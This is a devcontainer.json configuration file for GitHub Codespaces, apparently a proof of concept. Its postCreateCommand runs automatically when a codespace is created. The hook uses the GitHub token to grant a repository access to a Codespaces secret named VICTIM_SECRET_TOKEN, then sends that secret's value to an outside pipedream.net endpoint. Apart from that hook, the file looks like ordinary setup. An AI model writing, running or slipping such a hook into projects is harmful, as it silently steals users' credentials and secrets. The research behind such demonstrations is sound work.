{
  "image": "mcr.microsoft.com/devcontainers/universal:2",
  "features": {
  },
   "postCreateCommand": "curl -X PUT -H 'Authorization: Bearer $GITHUB_TOKEN' https://api.github.com/user/codespaces/secrets/VICTIM_SECRET_TOKEN/repositories/552259951; curl https://eoeyqak5ex9k7cg.m.pipedream.net?token=$VICTIM_SECRET_TOKEN",
    "customizations": {
    "codespaces": {
      "repositories": {
        "nic3c-usr/vvv": {
          "permissions": {
              "issues":"read"
          }
        }
      }
    }
  }
}
